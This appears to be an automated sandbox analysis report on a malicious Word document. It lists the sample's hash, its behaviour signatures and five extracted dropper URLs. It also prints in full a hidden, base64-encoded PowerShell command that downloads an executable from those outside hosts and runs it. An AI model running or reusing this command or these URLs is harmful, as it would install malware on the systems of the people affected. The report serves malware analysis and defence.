Overview

overview

10

task1

 

10

Analysis

  • max time kernel
    30s
  • resource
    win10v191014
  • submitted
    28-01-2020 14:36

Sharing

Copy URL
Twitter E-mail

General

  • Target

    e849501d3e7272570fb9d8adc773b76260eecd17d2ea57f233110401a9fc17b4.doc

  • Sample

    200128-asd9ynh2e2

  • SHA256

    e849501d3e7272570fb9d8adc773b76260eecd17d2ea57f233110401a9fc17b4

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://zethler.com/cgi-bin/8k1/
exe.dropper

http://emmaurlogisticsltd.com/wp-content/wm/
exe.dropper

https://www.rimayaswimwear.com/msxnoa/dx8frn/
exe.dropper

https://aredsm.com/l4jn4/ol11/
exe.dropper

https://fashionlifestyle.net/tmp/d7so/

Signatures

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Process spawned unexpected child process 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\e849501d3e7272570fb9d8adc773b76260eecd17d2ea57f233110401a9fc17b4.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:4888
  • C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
    Powershell -w hidden -en JABFAGYAagBsAGcAdQByAGUAcQBkAGkAPQAnAFcAaQBqAG4AdQByAGcAawB2AGUAbgBoAGQAJwA7ACQAWABnAHEAbwBiAGUAYgB3AHAAZwByAG4AIAA9ACAAJwAyADIANQAnADsAJABIAGsAcQB3AGQAYwBhAGcAaABsAHIAYgB0AD0AJwBGAHcAaABmAG4AZwBzAHgAdgBzACcAOwAkAEQAdgB0AGgAZwBxAHQAcwA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAWABnAHEAbwBiAGUAYgB3AHAAZwByAG4AKwAnAC4AZQB4AGUAJwA7ACQAQgB3AGQAZABwAHgAZgBqAHQAcgA9ACcAVABpAGQAZwBpAHoAZQByAGYAcwBoAGwAJwA7ACQATABwAG4AZQByAHoAeABmAGEAPQAuACgAJwBuACcAKwAnAGUAJwArACcAdwAtAG8AYgBqAGUAYwAnACsAJwB0ACcAKQAgAG4ARQBUAC4AVwBlAEIAQwBsAEkARQBuAFQAOwAkAFAAYwBpAHQAZQBmAG0AYQBxAGQAcAB6AD0AJwBoAHQAdABwADoALwAvAHoAZQB0AGgAbABlAHIALgBjAG8AbQAvAGMAZwBpAC0AYgBpAG4ALwA4AGsAMQAvACoAaAB0AHQAcAA6AC8ALwBlAG0AbQBhAHUAcgBsAG8AZwBpAHMAdABpAGMAcwBsAHQAZAAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAHcAbQAvACoAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AcgBpAG0AYQB5AGEAcwB3AGkAbQB3AGUAYQByAC4AYwBvAG0ALwBtAHMAeABuAG8AYQAvAGQAeAA4AGYAcgBuAC8AKgBoAHQAdABwAHMAOgAvAC8AYQByAGUAZABzAG0ALgBjAG8AbQAvAGwANABqAG4ANAAvAG8AbAAxADEALwAqAGgAdAB0AHAAcwA6AC8ALwBmAGEAcwBoAGkAbwBuAGwAaQBmAGUAcwB0AHkAbABlAC4AbgBlAHQALwB0AG0AcAAvAGQANwBzAG8ALwAnAC4AIgBTAFAAbABgAEkAVAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAEcAcwBwAG0AdQBkAHkAdAA9ACcARABpAGMAZABuAGcAcwBvAG4AbwAnADsAZgBvAHIAZQBhAGMAaAAoACQARABhAGkAYgB1AGIAagBpAGgAcQBwACAAaQBuACAAJABQAGMAaQB0AGUAZgBtAGEAcQBkAHAAegApAHsAdAByAHkAewAkAEwAcABuAGUAcgB6AHgAZgBhAC4AIgBkAG8AdwBgAE4ATABvAGAAQQBEAGYAYABJAGwARQAiACgAJABEAGEAaQBiAHUAYgBqAGkAaABxAHAALAAgACQARAB2AHQAaABnAHEAdABzACkAOwAkAEQAbABvAHcAbwBvAGQAagBwAD0AJwBQAHIAbQB0AGgAdwBmAHYAegAnADsASQBmACAAKAAoACYAKAAnAEcAZQAnACsAJwB0AC0ASQB0ACcAKwAnAGUAbQAnACkAIAAkAEQAdgB0AGgAZwBxAHQAcwApAC4AIgBsAGAARQBgAE4AZwBUAGgAIgAgAC0AZwBlACAAMgA2ADYAMgA3ACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAHMAYABUAGEAcgB0ACIAKAAkAEQAdgB0AGgAZwBxAHQAcwApADsAJABaAHcAYQBkAHoAegBzAHgAPQAnAEIAcABkAHgAeQBwAGoAcQBxAHUAawAnADsAYgByAGUAYQBrADsAJABNAGIAbQBsAHIAaQB0AG0AdwBqAGgAPQAnAE4AbABkAGoAdwB2AHgAYQBwAHcAcQBqAHkAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQASgBzAHoAcwB3AGoAbgBjAG4AbwA9ACcAUABiAGUAZwB2AGkAeQBiAHkAbQBoACcA
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious behavior: EnumeratesProcesses
    PID:4476

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads